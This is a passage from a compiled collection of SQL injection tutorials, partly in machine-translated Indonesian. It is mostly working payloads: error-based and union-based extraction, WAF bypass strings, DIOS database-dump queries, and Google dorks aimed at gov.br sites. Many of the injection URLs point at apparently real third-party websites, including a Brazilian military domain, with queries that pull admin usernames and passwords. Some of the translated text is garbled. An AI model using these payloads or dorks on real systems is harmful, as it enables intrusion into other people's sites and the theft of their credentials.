  1068. 3 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1050,1)))--
  1069.  
  1070. Result:
  1071.  
  1072. 'Xpath syntax error: :username'
  1073.  
  1074. 4 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 1150,1)))--
  1075.  
  1076. Result:
  1077.  
  1078. 'Xpath syntax error: :password'
  1079.  
  1080. 5 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users)))--
  1081.  
  1082. Result:
  1083.  
  1084. 'Xpath syntax error: :Admin:password1'
  1085.  
  1086. OR
  1087.  
  1088. 6 : www.site.com/error.php?id=null and extractvalue(rand(),concat(0x3a,(select concat(0x3a,username,0x3a,password) from users limit 1,1)))--
  1089.  
  1090. Source: GOOGLE.COM
  1091.  
  1092. Sekarang saya akan menunjukkan bagaimana mem-bypass filter WAF.
  1093.  
  1094. Sebelum Semua pastikan Anda memiliki pengetahuan dalam SQLi.
  1095.  
  1096. Ok Mari Mulai ..
  1097.  
  1098. Apa itu WAF atau Aplikasi Web Firewall>?
  1099. -A firewall aplikasi web (WAF) adalah alat, plugin server, atau filter yang menerapkan seperangkat aturan ke percakapan HTTP. Umumnya, aturan-aturan ini mencakup serangan umum seperti Cross-site Scripting (XSS) dan SQL Injection. Dengan menyesuaikan aturan untuk aplikasi Anda, banyak serangan dapat diidentifikasi dan diblokir. Upaya untuk melakukan kustomisasi ini dapat menjadi signifikan dan perlu dipertahankan karena aplikasi dimodifikasi.
  1100.  
  1101. Beberapa situs web menggunakan filter WAF.
  1102. Jika Anda menemukan situs vuln yang memiliki waf dan Anda mencoba untuk menyuntikkan permintaan berbasis Union dan Pertunjukannya Tidak Dapat Diterima, 403 terlarang atau Aplikasi Web FIrewall ALERT..Itulah berarti permintaan atau sintaks yang disuntikkan adalah Filter atau Diblokir oleh WAF.
  1103.  
  1104. Ok sekarang inilah beberapa metode untuk Bypass filter WAF.
  1105.  
  1106. 1) Komentar:
  1107.  
  1108. Komentar SQL adalah berkat bagi kita SQL injector. Mereka memungkinkan kita untuk melewati banyak pembatasan firewall aplikasi Web dan untuk membunuh pernyataan SQL tertentu untuk mengeksekusi perintah penyerang saat mengomentari pertanyaan sah yang sebenarnya. Beberapa komentar di SQL:
  1109.  
  1110. //,? , / ** /, #,? +,? -,;
  1111.  
  1112. 2) Mengubah Kasus:
  1113.  
  1114. Beberapa WAF? S hanya akan menyaring serangan huruf kecil. Seperti yang bisa kita lihat, kita dapat dengan mudah menghindarinya dengan mengubah huruf besar-kecil:
  1115. Kemungkinan filter Regex:
  1116.  
  1117. / union \ sselect / g
  1118. id = 1 + UnIoN / ** / SeLeCT, atau dengan XSS -> alert (1)
  1119.  
  1120. 3) Komentar Inline:
  1121.  
  1122. Beberapa kata kunci filter WAF seperti / union \ sselect / ig Kita dapat mem-bypass filter ini dengan menggunakan komentar inline sebagian besar waktu, Contoh yang lebih kompleks akan memerlukan pendekatan yang lebih canggih seperti menambahkan kata kunci SQL yang selanjutnya akan memisahkan dua kata:
  1123.  
  1124. id = 1 / *! UnIoN * / SeLeCT
  1125.  
  1126. Perhatikan tanda seru / *! Kode * / Tanda seru mengeksekusi pernyataan SQL kami.
  1127. Komentar sebaris dapat digunakan di seluruh pernyataan SQL sehingga jika table_name atau information_schema disaring, kita dapat menambahkan lebih banyak komentar sebaris. Sebagai contoh, mari kita berpura-pura sebuah situs menyaring serikat, di mana, table_name, table_schema, =, dan information_schema .. Ini adalah 3 pernyataan yang kita perlukan untuk menyuntikkan target kita.
  1128. Untuk ini kami akan:
  1129.  
  1130. id = 1 / *! UnIoN * / + SeLeCT + 1,2, concat (/ *! table_name * /) + FrOM /*information_schema*/.tables / *! WHERE * / + / *! TaBlE_ScHeMa * / + like + database ()? -
  1131.  
  1132. Kode di atas akan melewati filter. Perhatikan kami dapat menggunakan? Suka? bukannya? =?
  1133. Cara lain untuk menggunakan comemnts inline, ketika semuanya tampak gagal Anda dapat mencoba untuk melalui aplikasi Firewall off dengan menyusun pernyataan SQL menggunakan variabel:
  1134.  
  1135. id = 1 + UnIoN / * & a = * / SeLeCT / * & a = * / 1,2,3, database ()? -
  1136.  
  1137. Kode di atas harus melewati Union + pilih filter bahkan ketika komentar inline umum tidak bekerja dengan sendirinya
  1138.  
  1139. 4) Buffer Overflow: / Masukan yang tidak terduga:
  1140.  
  1141. Banyak WAFS ditulis dalam bahasa C yang membuat mereka cenderung meluap atau bertindak berbeda ketika dimuat dengan sekelompok data. Berikut adalah WAF yang melakukan tugasnya dengan benar, tetapi ketika diberikan sejumlah besar Data memungkinkan permintaan dan respons jahat.
  1142.  
  1143. id = 1 dan (pilih 1) = (Pilih 0xAAAAAAAAAAAAAAAAA 1000 lebih A? s) + UnIoN + SeLeCT + 1,2, versi (), 4,5, database (), gunakan r (), 8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26
  1144. , 27,28,29,30,31,32,33,34,35,36? +
  1145.  
  1146. Pemintas ini di atas berfungsi. Saya sendiri baru saja menggunakan ini terhadap situs Web baru-baru ini.
  1147.  
  1148. 5) Kata kunci yang diganti (preg_replace dan / atau WAF? S dengan tindakan yang sama
  1149.  
  1150. Terkadang dan aplikasi akan menghapus semua kata kunci. Sebagai contoh, katakanlah kita memiliki filter yang menggantikan serikat pilih dengan spasi. Kita bisa memotong filter itu seperti ini:
  1151.  
  1152. id = 1 + UNIunionON + SeLselectECT + 1,2,3?
  1153.  
  1154. Seperti yang Anda lihat setelah union + select telah dihapus modal kami UNION + SELECT mengambil tempat yang berhasil menyuntikkan permintaan kami:
  1155.  
  1156. UNION + PILIH + 1,2,3?
  1157.  
  1158. 6) Pengkodean karakter:
  1159.  
  1160. Kebanyakan WAF akan memecahkan kode dan menyaring masukan aplikasi, tetapi beberapa WAF hanya men-decode input sekali sehingga pengkodean ganda dapat melewati filter tertentu karena WAF akan men-decode input sekali kemudian menyaring sementara Aplikasi akan terus mendekode pernyataan SQL mengeksekusi kode kita.
  1161. Contoh enkode ganda:
  1162.  
  1163. id = 1% 252f% 252a * / UNION% 252f% 252a / SELECT% 252f% 252a * / 1,2, kata sandi% 252f% 252a * / FROM% 252f% 252a * / Pengguna? +
  1164. [# Tut By Pain006]
  1165.  
  1166. ©
  1167. ~ h
  1168.  
  1169.  
  1170. Bypass AQTRONIX WebKnight Filter IIS
  1171.  
  1172. http://www.site.com?id=1 and (2)=(s%elect convert(int,@@version))
  1173.  
  1174. http://www.site.com?id=1 and (2)=(s%elect convert(int,DB_N%AME()))
  1175.  
  1176. sql.php?id=2+un/**/ion+se/**/lect+1,2,3,4
  1177.  
  1178. sql.php?id=2+un/*%00*/ion+se/*%00*/lect+1,2,3,4,5
  1179.  
  1180. sql.php?id=2/**/union/**/select/**/1,2,3,4,5
  1181.  
  1182. sql.php?id=2+union+%0A+select+1,2,3,4,5
  1183.  
  1184. sql.php?id=2+/*%00*/+union+select+1,2,3,4,5
  1185.  
  1186. /?a=1+union/*&b=*/select+1,2
  1187.  
  1188. /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users
  1189.  
  1190. -Ph.h4rh4r
  1191.  
  1192. 400,403,404,406
  1193. ERROR BYPASS
  1194. --------------------
  1195.  
  1196. %55nion/**/%53elect
  1197.  
  1198. id=null%0A/**//*!50000%55nIOn*//*yoU*/all/**/%0A/*!%53eLEct*/%0A/*AAA*/+1,2,3--+
  1199.  
  1200. 500
  1201. ERROR BYPASS
  1202. --------------------
  1203.  
  1204. and (select 1)=(Select 0xAA)+UnIoN+SeLeCt+1,2,3--+
  1205.  
  1206. **NOTE: if you are in IE,and its ASP site,and you get error 500,goto chrome.**
  1207.  
  1208. 1064
  1209. ERROR BYPASS
  1210. --------------------
  1211.  
  1212. /**/Union/**/Select/**/
  1213.  
  1214. uniunionon+selselectect
  1215.  
  1216. id=(0)union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))
  1217.  
  1218. if you get error 1064 like:
  1219.  
  1220. ...syntax to use near 'union select 1,2,3,4,5,6,7,8,9' at line 1...
  1221.  
  1222. its version 3,use this one
  1223.  
  1224. +or+1+group+by+concat(concat_ws(0x7c,version(),database(),user()),floor(rand(0)*?2))+having+min(0)+or+1--+-
  1225.  
  1226.  
  1227. Error Based Injection
  1228. ---------------------
  1229. Error based injection is deployed on databases which is powered by MS-SQL.
  1230.  
  1231. Database: MY-SQL : PHP
  1232. MS-SQL : .asp or .aspx
  1233.  
  1234. Probelm with Error Based Injection for a Hacker
  1235. -----------------------------------------------
  1236. 1. Version() and database() not works!!
  1237. Solution : @@version
  1238.  
  1239. 2. You can not call all the tables from the given database through information_schema.
  1240.  
  1241. 3. You cannot extract columns of your target table in a go.
  1242.  
  1243. Why it is known as Error Based Injection
  1244. -----------------------------------------
  1245. It means you will get the data in an error.
  1246.  
  1247. Target : vulnweb.com : It is practice framework from a company called Acunetix.
  1248.  
  1249. It has all MY-SQL and MS-SQL technology attack practices.
  1250.  
  1251. Step 1: Get any GET method in the URL of the website. I.e We have to look for any SOmethoing=Something.
  1252. http://testasp.vulnweb.com/showforum.asp?id=0
  1253.  
  1254. Step 2: Check the exception handling.
  1255. http://testasp.vulnweb.com/showforum.asp?id=0'
  1256.  
  1257. Step 3: Check the conditions required for further attack.
  1258. http://testasp.vulnweb.com/showforum.asp?id=0 and 1=0;
  1259.  
  1260. NOte : Error Based Injection works on LIFO rule. Last in First out.
  1261.  
  1262. For Example: If we have a database with tables like followings
  1263. threads -> 1
  1264. teacher->2
  1265. classes->3
  1266. fee->4
  1267. users->5
  1268.  
  1269. Step 4: http://testasp.vulnweb.com/showforum.asp?id=0 and
  1270. 1=convert(int,(select top 1 table_name from information_schema.tables));
  1271.  
  1272. Got Table : 'threads' X
  1273. http://testasp.vulnweb.com/showforum.asp?id=0 and
  1274. 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('threads')));
  1275.  
  1276. Target : 'users'
  1277.  
  1278. Step 5: Get the respective columns of the users table
  1279. http://testasp.vulnweb.com/showforum.asp?id=0 and
  1280. 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='users' and column_name not in ('uname')));
  1281.  
  1282. Target Column : uname, upass
  1283.  
  1284. Step 6: Get the uname and upass
  1285. http://testasp.vulnweb.com/showforum.asp?id=0 and
  1286. 1=convert(int,(select top 1 upass from users));
  1287.  
  1288. uname:admin
  1289. upass: none
  1290.  
  1291. ~h
  1292.  
  1293.  
  1294. D I O S B Y P A S S
  1295.  
  1296. DIOS MRFMR
  1297. concat(0x494e4a454354204259204d522e464d52,0x3c62723e,/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/)
  1298.  
  1299. DIOS MRFMR WAF
  1300. /*!00000concat*/(0x3C666F6E7420666163653D224963656C616E6422207374796C653D22636F6C6F723A7265643B746578742D736861646F773A307078203170782035707820233030303B666F6E742D73697A653A33307078223E496E6A6563746564206279204D722E464D5220782054333735344B315431203C2F666F6E743E3C62723E3C62723E3C666F6E7420636F6C6F723D626C61636B2073697A653D353E44622056657273696F6E203A20,version(),0x3c62723e44622055736572203a20,user(),0x3C62723E2053796D203A,@@HAVE_SYMLINK,0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
  1301.  
  1302. DIOS WAF
  1303. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
  1304.  
  1305. DIOS SULE
  1306. Concat(0x3c43656e7465723e,0x3c466f6e7420436f6c6f723d22526564223e,0x3c62723e,0x3c62723e,0x3c62723e,0x3c62723e,0x4696e6a6563746564206279202e2f53756c6547616e73,0x3c62723e,0x3c62723e,0x566572736920,0x3a,Version(),0x3c62723e,0x446174616261736520,0x3a,Database(),0x3c62723e,0x5573657220,0x3a,User(),@C:=0x00,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,Column_Name)),0x00,0x00),@c,0x3c2f466f6e743e,0x3c2f43656e7465723e)
  1307.  
  1308. DUMP
  1309. (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(namadb.namatable)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x7e,password,0x3c62723e))))x)
  1310.  
  1311. (/*!50000SELECT(@x*/)/*!50000FROM*/(/*!50000SELECT(@x:=0x00*/) ,(/*!50000SELECT(@x*/)/*!50000FROM*/(miat_web2014.tbladmin)/*!50000WHERE*/(@x)/*!50000IN*/(@x:=/*!50000CONCAT*/(0x20,@x,adminName,0x7e,adminpass,0x3c62723e))))x)
  1312.  
  1313. LOKOMEDIA
  1314. 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
  1315.  
  1316. DIOS WAF MOD SECURITY
  1317. /*!50000CONCAT*/(0x3c43656e7465723e,0x496e6a656374696f6e204279204d72765f323331,0x3c62723e,0x3c62723e,version/***/(),0x3c62723e,database/**/(),0x3c62723e,user/**/(),@C:=0x3c62723e,If((/!50000Select*/+Count()+/!50000From*/+/*!50000Information_Schema*/.Columns+/*!50000Where*/+Table_Schema=database/***/()+And+@C:=/!50000CONCAT*/(@C,0x3c62723e,/*!50000Table_Name*/,0x3a,0x3a,0x3a,0x3a,/*!50000Column_Name*/)),0x3a,0x00),@C)
  1318.  
  1319. ~hl
  1320.  
  1321.  
  1322. Beberapa injector hanya memakai query bypass tanpa menganalisa bagian kata yg di block oleh WAF ( Web Aplication Firewall )
  1323.  
  1324. Sebelum nya Testing dlu :D
  1325.  
  1326. kalau Order by ga work . coba pakai group+by :D
  1327.  
  1328. http://www.webshit.com/vulnscript.php?id=1+order+by+1--+-
  1329.  
  1330. http://www.webshit.com/vulnscript.php?id=1+group+by+1--+-
  1331.  
  1332. ----------------------------------------
  1333.  
  1334. http://www.webshit.com/vulnscript.php?id=1+union--+- [waf]
  1335.  
  1336. http://www.webshit.com/vulnscript.php?id=1+select--+- [No waf]
  1337.  
  1338. brarti fungsi union di block .
  1339. kita coba bypass dngan kombinasi Uppercase dan lowercase .
  1340.  
  1341. http://www.webshit.com/vulnscript.php?id=1+uNiOn--+- [waf Bypassed]
  1342.  
  1343. atau klo masih kena Waf
  1344.  
  1345. http://www.webshit.com/vulnscript.php?id=2 /*!uNiOn*/--+-
  1346.  
  1347. atau
  1348.  
  1349. http://www.webshit.com/vulnscript.php?id=1+/*!50000uNiOn*/--+-
  1350.  
  1351. okay bypassed :D
  1352.  
  1353. -------------------------------------
  1354.  
  1355. tahap berikut nya Union Select
  1356.  
  1357. http://www.webshit.com/vulnscript.php?id=1+union--+- [no waf]
  1358.  
  1359. http://www.webshit.com/vulnscript.php?id=1+select--+- [no waf]
  1360.  
  1361. tapi saat
  1362.  
  1363. http://www.webshit.com/vulnscript.php?id=1+union+select--+- [Waf]
  1364.  
  1365. brarti Waf block kombinasi kata union select ..
  1366.  
  1367. kita bs bypass dgn
  1368.  
  1369. http://www.webshit.com/vulnscript.php?id=1+union+distinctROW+select--+-
  1370.  
  1371. atau
  1372.  
  1373. http://www.webshit.com/vulnscript.php?id=1+union%23%0aselect--+-
  1374.  
  1375. yuhuu Bypassed :D
  1376.  
  1377. ---------------------------------------
  1378.  
  1379. Bypass dengan url Encode jg bs
  1380.  
  1381. http://www.webshit.com/vulnscript.php?id=1+%75Nion+%73eLect--+-
  1382.  
  1383. %75 = u
  1384. %73 = s
  1385.  
  1386. ----------------------------------------
  1387.  
  1388. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1--+- [no waf]
  1389.  
  1390. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,2--+- [waf]
  1391.  
  1392. Hmm ketika menambah (,) kena waf , brarti koma harus dibypass :D
  1393.  
  1394. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2--+- [bypassed]
  1395.  
  1396. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2,~~3,~~4,~~5--+- [bypassed]
  1397.  
  1398. atau
  1399.  
  1400. http://www.webshit.com/vulnscript.php?id=1+uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
  1401.  
  1402. atau dgn method join :v
  1403.  
  1404. ----------------------------------------
  1405.  
  1406. beberapa injector menggunakan UnionOnOn / informationmation_schema_schema tnpa tau maksud query itu :p
  1407.  
  1408. oke skrang kita cari tau :v
  1409.  
  1410. live target :
  1411.  
  1412. http://zixem.altervista.org/SQLi/level3.php?item=3'+union--+-
  1413.  
  1414. hasil :
  1415.  
  1416. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
  1417.  
  1418. dari situ kita bs liat kalau "on" pada "union" hilang :v
  1419.  
  1420. bagaimana bypass nya ??
  1421.  
  1422. tambahin aja on di union nya jadi unionon :v
  1423.  
  1424. http://zixem.altervista.org/SQLi/level3.php?item=3'+unionon--+-
  1425.  
  1426. wokee bypassed :D
  1427.  
  1428. selanjutnya sperti biasa
  1429.  
  1430. http://zixem.altervista.org/SQLi/level3.php?item=3%27+and+0+unionon+select+concat(%27versailles%20::%20%27,version()),2,4,5--+-
  1431.  
  1432. ###############################
  1433. Alternativ bypass union select jika langkah diatas blm bs bypass .
  1434.  
  1435. uni<>on sel<>ect
  1436.  
  1437. uni*on sel*ect
  1438.  
  1439. (uni)(on) (sel)(ect)
  1440.  
  1441. uni[]on sel[]ect
  1442.  
  1443. uni\on sel\ect
  1444. ###############################
  1445.  
  1446. Thanks
  1447.  
  1448.  
  1449.  
  1450. SQLI Tutorial - Beginners
  1451.  
  1452. http://www.ikar.ru/eng/research.php?id=1+and+1=0+union+select+1,2,concat(Login,0x3a,Password,0x3a,Status),4,5+FROM+Users+limit+0,1
  1453.  
  1454. http://www.njgsca.org/blog.php?id=-1+union+select+1,username,3,4,5,6,7%20from%20users
  1455.  
  1456. -h
  1457.  
  1458. SQL INJECTION BYPASSES TRICKS :)
  1459.  
  1460. 1-?name=Thomas'%20GROUP%20BY%20100%20asc%23
  1461.  
  1462. 2-?name=Thomas'-%20.1GROUP%20BY%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%20asc%23
  1463.  
  1464. 3-?name=Thomas'- .1/*!50000group*/%23aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1465. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1466. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1467. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1468. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1469. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1470. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1471. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1472. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1473. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1474. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1475. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
  1476. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0aby --+%0A100;%00
  1477.  
  1478. 4-?name=Thomas'- .1INTO @%60
  1479. 4,1-?name=Thomas'- .1INTO @,@%60
  1480. 4,2-?name=Thomas'- .1INTO @,@,@--
  1481. 4,3-?name=Thomas'- .1INTO @,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
  1482. ,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@
  1483. ,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@,@ ;%00
  1484.  
  1485. 5-?name=Thomas'- .1/*!50000group*//*** ^ ***/By --+%0A100;%00
  1486.  
  1487. 6-?name=Thomas'orderby100--- (let me know if you get normal error here no waf)
  1488.  
  1489. Retrieving Columns By Using PROCEDURE ANALYSE()
  1490.  
  1491. 7-?name=Thomas' PROCEDURE ANALYSE() Get the first column's name
  1492. 7,1-?name=Thomas' LIMIT 1,1 PROCEDURE ANALYSE() Get the second column's name
  1493. 7,2-?name=Thomas' LIMIT 2,1 PROCEDURE ANALYSE() Get the third column's name
  1494.  
  1495. 8-?name=Thomas',0;--+;%00 <<< Play Here With Zero Number >>> 0;--+;%00
  1496.  
  1497. 0;--+;%00
  1498. 1;--+;%00
  1499. 2;--+;%00
  1500.  
  1501. ETC.
  1502.  
  1503. 9-?name=Thomas'%0D%0Aorder%0D%0Aby 100--
  1504.  
  1505. 10-?name=Thomas'%0Bgroup%0Bby%0A1,2%23
  1506.  
  1507. 11-?name=Thomas'/*!50000union*/-- (let me know if you get normal error here no waf)
  1508.  
  1509. 12-?name=Thomas' or .0union/**/distinctrow%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow-1--
  1510.  
  1511. 13-?name=Thomas'%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aunion-- (let me know if you get normal error here no waf)
  1512.  
  1513. 14-?name=Thomas'%20And .0UnIOn--%20-%0ASeLe%43t-1--
  1514.  
  1515. 15?name=Thomas'%75%6e%69%6f%6e--%20-%0%73%65%6c%65%63%74-1--
  1516.  
  1517. 16-?name=Thomas'||!{f`id`}union-- a%0Aselect@--
  1518.  
  1519. 17-?name=Thomas'||!{f`id`}/*!00000union*/-- (let me know if you get normal error here no waf)
  1520.  
  1521. 18-?name=LlRob21hcydHcm95cCBieSAxMDAtLSAt (let me know what happen here)
  1522.  
  1523. -rkx
  1524.  
  1525. CATEGORIES: SQL INJECTION
  1526.  
  1527. inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_fetch_assoc()
  1528.  
  1529. inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_fetch_array()
  1530.  
  1531. inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_num_rows()
  1532.  
  1533. inurl:"gov.br" & inurl:"id=" & intext:"warning: session_start()
  1534.  
  1535. inurl:"gov.br" & inurl:"id=" & intext:"warning: getimagesize()
  1536.  
  1537. inurl:"gov.br" & inurl:"id=" & intext:"warning: is_writable()
  1538.  
  1539. inurl:"gov.br" & inurl:"id=" & intext:"warning: unknown()
  1540.  
  1541. inurl:"gov.br" & inurl:"id=" & intext:"warning: mysql_result()
  1542.  
  1543. inurl:"gov.br" & inurl:"id=" & intext:"warning: pg_exec()
  1544.  
  1545. inurl:"gov.
  1546.  
  1547. You can change the domain what ever you want :)
  1548.  
  1549. -h
  1550.  
  1551. INTERBASE - FIREBIRDSQL
  1552.  
  1553. http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=361/**/and/**/1=user
  1554.  
  1555. http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=361/**/and/**/1=(select/**/first/**/1/**/rdb$field_name/**/from/**/rdb$relation_fields)--
  1556.  
  1557. http://www.infomedia.by/image.php?operator=2)+and+1=2+union+select+rdb$field_name,2+from+rdb$relation_fields -
  1558.  
  1559. http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+rdb$relation_name+from+rdb$relation_fields) -
  1560.  
  1561. http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0) -
  1562.  
  1563. http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+n+distinct+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0) -
  1564. http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+n+rdb$field_name+from+rdb$relation_fields+where+rdb$system_flag=0+and+rdb$relation_name=ascii_char(83)||ascii_char(85)||ascii_char(66)||ascii_char(83)) -
  1565.  
  1566. http://www.infomedia.by/image.php?operator=2)+and+1=(select+first+1+skip+0+distinct+cast(id||name+as+char(777))+from+autor) -
  1567.  
  1568. http://www.infomedia.by/image.php?operator=2)+and+substring((select+first+1+rdb$relation_name+from+rdb$relation_fields)+from+n+for+1)!=ascii_char(63)+and+(1=1))
  1569.  
  1570. http://www.ppc4all.com/category.php?cat=(select+first+1+user+from+rdb$relation_fields)
  1571.  
  1572.  
  1573. rdb$relation_name - name of the table
  1574. rdb$system_flag - belong to the system table (a good way of screening, 1 = System)
  1575. rdb$field_name - obvious from the name
  1576. rdb$system_flag - the same
  1577. rdb$field_position - the serial number field
  1578. rdb$relation_name, rdb $ base_field - define table names
  1579.  
  1580. ©
  1581. -h
  1582.  
  1583. Langkah-1: Memulai dengan Berbasis Union:
  1584.  
  1585. Setiap db menggunakan prinsip yang sama untuk menarik data keluar dari db ofcourse itu pilih menggunakan nama kolom yang tepat.
  1586.  
  1587. Saya tidak akan menjelaskan tentang pilih sebab yang saya tahu tentang itu.
  1588.  
  1589.  
  1590. Langkah-2: Memeriksa Target Untuk Vunl.
  1591.  
  1592. Kode:
  1593. http://www.crookedtree.org/index.php?catid=583 '
  1594.  
  1595. kesalahan telah terjadi dengan database! SELECT *
  1596. DARI bus_kategori
  1597. MANA id = 583 \ '
  1598.  
  1599. Kesalahan MYSQL dengan MYSQL atau MS SQL dengan SQL atau ORACLE dengan ORA atau MS ACCESS dengan Jet dan
  1600. Peringatan: pg_exec () [function.pg-exec] <== PostgreSQL ATAU kesalahan seperti di atas.
  1601.  
  1602.  
  1603. Langkah-3: Mendapatkan Jumlah Kolom
  1604.  
  1605. Untuk Mendapatkan kolom, kami menggunakan metode yang sama yang digunakan dalam urutan db lain dengan kami menggunakan - atau # untuk komentar.
  1606.  
  1607. Kode:
  1608. http://www.crookedtree.org/index.php?catid=583 pesanan dengan 1-- <== tidak ada kesalahan
